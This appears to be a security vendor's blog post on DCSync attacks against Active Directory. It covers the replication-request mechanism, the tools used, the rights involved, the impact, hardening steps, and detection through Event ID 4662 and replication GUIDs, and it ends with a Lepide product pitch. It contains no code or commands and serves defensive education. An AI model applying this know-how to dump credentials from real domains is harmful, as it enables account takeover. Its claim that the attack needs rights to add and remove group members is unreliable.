How Common are DCSync Attacks?
DCSync attacks are a relatively common form of credential dumping, often used to maintain persistence or elevate privileges. DCSync is employed by various threat actors, including well-known groups and campaigns such as LAPSUS$ and Solar Winds.
While not a necessary component of every attack, DCSync is often used when an attacker has gained access to an Active Directory account with elevated privileges, such as membership in groups like Administrators, Domain Admins, or Enterprise Admin.
In many cases, attackers may already have what they need, making DCSync unnecessary. However, a more common scenario involves accounts delegated “Replicating Directory Changes” permissions, which are often granted to applications that integrate with Active Directory. For example, an attacker may leverage an Azure AD DS Connector account to perform a DCSync attack.
How Does a DCSync Attack Work?
A DCSync attack is a type of attack that can be performed using various tools, including mimikatz, Impacket’s secretsdump, and DSInternals’ Get-ADReplAccount. The attack involves using credentials from an account with specific permissions to replicate domain controller data, which does not require an interactive logon to a DC. The required permissions include reading all user and computer objects, group objects, and domain controllers, as well as the ability to add and remove groups and members.
The attack can be launched from a remote DC, a configuration option in each tool, or from any machine on the network. The goal of the attack can be to target a specific user account or dump the entire Active Directory (AD) to a file.
The attack process involves the following steps:
- The attacker identifies a domain controller to request replication.
- The attacker sends a GetNCChanges request to the DC to request user replication data.
- The DC returns the replication data to the requestor, including password hashes.
The attack requires the following rights:
- Replicating Directory Changes
- Replicating Directory Changes All
Impact of a DCSync Attack
A DCSync attack has a significant impact on a network’s security. Once an attacker gains access to AD data, they can exploit it to launch further attacks without needing to obtain clear-text passwords. This can include pass-the-hash, NTLM relay, and pass-the-ticket attacks, which allow the attacker to access sensitive applications and potentially pivot into the cloud.
Additionally, cracked password hashes can reveal trends or default passwords used elsewhere, further compromising security. Moreover, if passwords are stored in reversible-encrypted formats, a DCSync attack can pull passwords in clear-text, granting immediate authentication and serious security risks.
Furthermore, the Golden Ticket attack can be launched, which allows the attacker to forge Kerberos tickets and authenticate as any account in the AD, posing a high risk of unauthorized access and potential security breaches.
How to Protect AD Against DCSync Attacks
To effectively defend against DCSync attacks, it is essential to properly protect accounts with elevated permissions. This involves scrutinizing account membership in the Administrators, Domain Admins, and Enterprise Admins groups. Ensure that only dedicated admin accounts with good passwords and account protections are remaining in these groups. Additionally, identify and protect accounts granted “Replicating Directory Changes” at the domain root.
Protecting Domain Controllers
Protecting domain controllers (DCs) from DCSync attacks is crucial. This includes enforcing NTLMv2, applying monthly security patches, running the most up-to-date operating system, and monitoring for regular user account access. It is important to note that one DC can be used to attack another, making protection crucial.
Detecting DCSync Attacks
To detect DCSync attacks, monitor network traffic for replication events originating from a non-DC IP address. Look for traffic using the DRSUAPI protocol and requests for a DsGetNCChanges operation. Check Windows event logs for Event ID 4662 on DCs, which indicates a replication event occurrence. Filter on GUIDs associated with DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) to gather information about the replication event and identify targeted accounts.
How Lepide Helps Detect DCSync Attacks
The Lepide Data Security Platform can help to detect and respond to DCSync attacks through its advanced detection capabilities. The platform will monitor domain replication traffic for suspicious activity, allowing it to identify patterns of behavior indicative of a DCSync attack. By analyzing replication traffic between domain controllers and non-domain controllers, Lepide’s solution can detect and alert on DCSync attacks, providing critical information such as the perpetrator’s identity, the targeted domain and user, and supporting evidence. This comprehensive approach enables fast and effective response to DCSync attacks, including blocking privilege escalation to prevent attackers from escalating their access and exploiting further.